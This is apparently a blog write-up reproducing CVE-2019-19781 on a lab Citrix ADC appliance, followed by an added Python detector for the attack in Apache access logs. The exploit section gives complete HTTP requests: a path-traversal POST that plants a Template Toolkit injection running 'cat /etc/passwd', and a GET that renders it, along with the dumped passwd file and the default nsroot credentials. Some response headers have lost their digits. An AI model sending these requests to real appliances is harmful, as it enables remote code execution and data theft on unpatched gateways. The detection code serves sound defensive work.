CVE-2019-19781 Citrix ADC Remote Code Execution Vulnerability Reproduction
- 13 February 2020
- Notes
0x01 Download the file NSVPX-ESX-13.0-47.22_nc_64.zip
#### https://www.citrix.com/downloads/citrix-gateway/

Configure a static IP for the appliance


0x02 nmap scan
Scanning 192.168.3.244 [ ports]
Discovered open port /tcp on 192.168.3.244
Discovered open port /tcp on 192.168.3.244
Discovered open port /tcp on 192.168.3.244

No certificate is installed, so the interface is reached over plain HTTP:
http://192.168.3.244/
default password: nsroot/nsroot

0x03 Upload the XML template

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97

url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:36:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 11 Jan 2020 06:36:44 GMT
ETag: W/"87-59bdd52283e00"
Accept-Ranges: bytes
Content-Length: 135
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<HTML>
<BODY>
<SCRIPT language=javascript type=text/javascript>
//parent.window.ns_reload();
window.close();
</SCRIPT>
</BODY>
</HTML>
0x04 Execute the command

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 OK
Date: Sat, Jan :: GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-control: no-cache
X-XSS-Protection: ; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=, max=
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-
Expires: Sat, Jan :: GMT
Content-Length:

# $FreeBSD: release/8.4./etc/master.passwd -- ::Z rwatson $
#
root:*:::Charlie &:/root:/usr/bin/bash
nsroot:*:::Netscaler Root:/root:/netscaler/nssh
daemon:*:::Owner of many system processes:/root:/usr/sbin/nologin
operator:*:::System &:/:/usr/sbin/nologin
bin:*:::Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:::Tty Sandbox:/:/usr/sbin/nologin
kmem:*:::KMem Sandbox:/:/usr/sbin/nologin
games:*:::Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:::News Subsystem:/:/usr/sbin/nologin
man:*:::Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:::Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:::Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:::Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:::Bind Sandbox:/:/usr/sbin/nologin
proxy:*:::Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:::pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:::dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:::UUCP pseudo-user:/var/spool/uucppublic:/usr/sbin/nologin
pop:*:::Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:::Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:::World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:::HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:::Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:::Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin
undef error - Attempt to bless into a reference at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.
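Both stages of the exploitation above leave the same fingerprint in the appliance's Apache access log (/var/log/httpaccess.log and its rotated copies): a request whose decoded URL contains both "/vpns/" and "/../", which is also the condition Citrix's interim responder-policy mitigation (CTX267027) keyed on. The following detector is an added example, not code from the original post or from Citrix; it parses constructed Apache combined-format log lines modelled on the two requests shown, URL-decodes the target so percent-encoded dots are not missed, normalises the path, and labels hits as the template-write stage (newbm.pl) or the template-render stage (an .xml under /vpns/portal/). The log lines, the source IP and the label names are constructed for the example.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed sample lines in Apache combined format (not real appliance logs).
SAMPLE_LOG = """\
192.168.3.1 - - [11/Jan/2020:06:36:44 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 135 "-" "1"
192.168.3.1 - - [11/Jan/2020:06:37:10 +0000] "GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
192.168.3.1 - - [11/Jan/2020:06:38:02 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.3.1 - - [11/Jan/2020:06:38:30 +0000] "GET /vpn/%2e%2e/vpns/portal/jas502n.xml HTTP/1.1" 200 1834 "-" "curl/7.64.1"
192.168.3.1 - - [11/Jan/2020:06:39:00 +0000] "GET /vpns/portal/index.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Source address, timestamp, request line and status of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

STAGE1 = "stage1-template-write"   # POST to the bookmark script via traversal
STAGE2 = "stage2-template-render"  # GET of a planted template via traversal
OTHER = "traversal-into-vpns"      # any other "/../" reaching /vpns/


def classify_path(raw_target):
    """Return a finding label for one request target, or None if it is benign.

    The test mirrors the CTX267027 responder policy: the decoded URL must
    contain both "/vpns/" and "/../". Legitimate /vpns/ access by an
    authenticated VPN session has no "/../" and is therefore not flagged.
    """
    path = unquote(raw_target.split("?", 1)[0])  # decode %2e%2e, %2f, ...
    if "/vpns/" not in path or "/../" not in path:
        return None
    resolved = normpath(path)  # collapse the ".." so the real target is visible
    if resolved.endswith("/vpns/portal/scripts/newbm.pl"):
        return STAGE1
    if resolved.startswith("/vpns/portal/") and resolved.endswith(".xml"):
        return STAGE2
    return OTHER


def scan_log(text):
    """Return (src, method, resolved_path, label) for every suspicious entry."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format entries
        label = classify_path(m.group("target"))
        if label is not None:
            resolved = normpath(unquote(m.group("target").split("?", 1)[0]))
            findings.append((m.group("src"), m.group("method"), resolved, label))
    return findings


if __name__ == "__main__":
    for src, method, path, label in scan_log(SAMPLE_LOG):
        print(f"{label:24} {src:15} {method:5} {path}")
```

Because the access log does not record request headers, the NSC_USER traversal value used to choose the template file name is not visible here; a hit on the write stage is the cue to list /netscaler/portal/templates/ and /var/vpn/bookmark/ for .xml files that do not belong to the product and to review any templates the rendering stage requested.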
References
https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/